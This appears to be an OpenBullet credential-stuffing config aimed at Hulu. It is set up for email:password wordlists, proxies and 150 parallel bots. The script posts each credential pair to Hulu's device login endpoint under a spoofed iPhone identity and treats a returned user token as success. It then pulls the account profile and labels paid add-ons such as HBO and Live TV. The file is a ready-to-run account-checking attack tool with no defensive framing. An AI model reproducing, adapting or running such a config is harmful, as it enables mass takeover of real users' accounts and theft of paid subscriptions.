[SETTINGS]
{
  "Name": "Hulu Api",
  "SuggestedBots": 150,
  "LastModified": "2019-05-29T23:28:16.4796271+02:00",
  "AdditionalInfo": "",
  "Author": "INFINITEY",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#LOGIN REQUEST POST "https://auth.hulu.com/v1/device/password/authenticate" 
  CONTENT "affiliate_name=apple&friendly_name=fuckyou+Iphone&password=<PASS>&product_name=iPhone7%2C2&serial_number=00001e854946e42b1cbf418fe7d2dcd64df0&user_email=<USER>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
#CHECK KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Your login is invalid. Please try again" 
  KEYCHAIN Success AND 
    KEY "user_token" 
    KEY "device_token" 
#TK PARSE "<SOURCE>" LR "\"user_token\":\"" "\",\"e" -> VAR "TK" 
#USER_INFO REQUEST GET "https://home.hulu.com/v1/users/self" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <TK>" 
#PACKAGES PARSE "<SOURCE>" LR "package_ids\":[\"1\",\"2\"," ",\"c" -> VAR "PackageId" "[" "" 
#NAMES FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "\"14\"" VALUE "No Commercials" 
  KEY "\"16\"" VALUE "Live TV" 
  KEY "\"15\"" VALUE "Showtime" 
  KEY "\"17\"" VALUE "HBO" 
  KEY "\"18\"" VALUE "Cinemax" 
  KEY "\"19\"" VALUE "STARZ" 
  "<PackageId>" -> CAP "Subscription" 
